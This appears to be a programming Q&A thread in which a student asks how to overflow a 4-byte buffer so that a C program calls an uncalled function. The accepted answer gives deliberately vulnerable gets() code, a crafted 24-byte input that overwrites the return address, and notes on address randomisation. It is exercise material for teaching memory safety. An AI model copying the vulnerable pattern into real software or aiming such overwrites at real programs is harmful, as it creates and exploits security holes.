# Forcing a program to call a function in C with an input string

Tags: c, gdb, buffer, machine-code

So I'm doing an exercise where I want to call the function void not_called() just by inputting a buffer.  Basically what I want to do is use a buffer overflow to call not_called().  I'm approaching this by using a binary exploit string then using a program hex2raw (takes hex format then turns it into the ASCII for decimal digit.)  I'm then going to put that binary exploit string into a .txt file, then use a series of pipes in the unix terminal to call not_called() like so:

cat exploit.txt | ./hex2raw | ./nameofpgrm

So what I'm struggling with is finding that binary exploit string.  I think what I need to do is find the location in memory where not_called is called with an objdump, but I'm not sure.  Any help on what I can do?  I know I'm going to have to use gdb to find it.  I just don't really know where to look.

```
#include <stdlib.h>
#include <stdio.h>
void echo();

/* Main program */
int main() {
  while (1)
      echo();
  return(0); // never called
} // main

/* My gets -- just like gets - Get a string from stdin */
char *mygets(char *dest) {
  int c = getchar();
  char *p = dest;
  while (c != EOF && c != '\n') {
    *p++ = c;
     c = getchar();
  }
  *p = '\0';
  return dest;
} // mygets

/* Echo Line */
void echo() {
  char buf[4];    /* Way too small */

  mygets(buf);
  puts(buf);
} // echo

void not_called() {
  printf("This routine is never called\n");
  printf("If you see this message, something bad has happend\n");
  exit(0);
} // not_called
```

Answer (score 1, accepted):

You want to overwrite the return address from the function echo with bytes read from stdin so that is now points to `not_called` entry point.

Let's use for example Mac OS/X 10.10 aka Yosemite.  I simplified the code and added an extra printf to get the actual address of the function `not_called`:

```
#include <stdlib.h>
#include <stdio.h>

void echo(void) {
    char buf[4];    /* Way too small */
    gets(buf);
    puts(buf);
}

void not_called(void) {
    printf("This routine is never called\n");
    printf("If you see this message, something bad has happened\n");
    exit(0);
}

int main(void) {
    printf("not_called is at address %p\n", not_called);
    echo();
}
```

Let's compile and execute this code using clang:

```
chqrlie> clang t20.c && ./a.out
```

The output is quite clear:

```
not_called is at address 0x106dade50
warning: this program uses gets(), which is unsafe.
```

Using a hex editor, let's coin the input and paste it to the console: the short buffer `buf` aligned on 64 bits, 8 bytes below the saved copy of the stack frame pointer `rbp`, itself followed by the return address we want to overwrite.  The input in hex is for example:

```
0000  3031 3233 3435 3637-3839 3031 3233 3435  0123456789012345
0010  50de da06 0100 0000-                     P��.....
```

Let's paste these 24 bytes to the console and hit enter:

```
0123456789012345P��^F^A^@^@^@
0123456789012345P��^F^A
This routine is never called
If you see this message, something bad has happened
Segmentation fault: 11
```

Function `echo` uses gets to read stdin, the 24 bytes are stored beyond the end of `buf`, overwriting the frame pointer `rbp`, the return address, and an extra 0 byte.  `echo` then calls `puts` to output the string in `buf`.  Output stops at the first "'\0'" as expected. `rbp` is then restored from the stack and gets a corrupt value, control is transferred to the return address.  The return address was overwritten with that of function `not_called`, so that's what gets executed next.  Indeed we see the message from function `not_called` and for some reason `exit` crashes instead of exiting the process gracefully.

I used `gets` on purpose so readers understand how easy it to cause buffer overflows with this function.  No matter how big the buffer, input can be coined to crash the program or make it do interesting things.

Another interesting find is how Mac OS/X tries to prevent attackers from using this trick too easily:  the address printed by the program varies from one execution to the next:

```
chqrlie > ./a.out < /dev/null
not_called is at address 0x101db8e50
warning: this program uses gets(), which is unsafe.
chqrlie > ./a.out < /dev/null
not_called is at address 0x10af4ae50
warning: this program uses gets(), which is unsafe.
chqrlie > ./a.out < /dev/null
not_called is at address 0x102a46e50
warning: this program uses gets(), which is unsafe.
```

The code is loaded at a different address each time, chosen randomly.
The input required to make function `echo` return to `not_called` is different each time.  Try your own OS and check if it uses this trick.  Try coining the appropriate input to get the job done (it depends on your compiler and your system).  Have fun!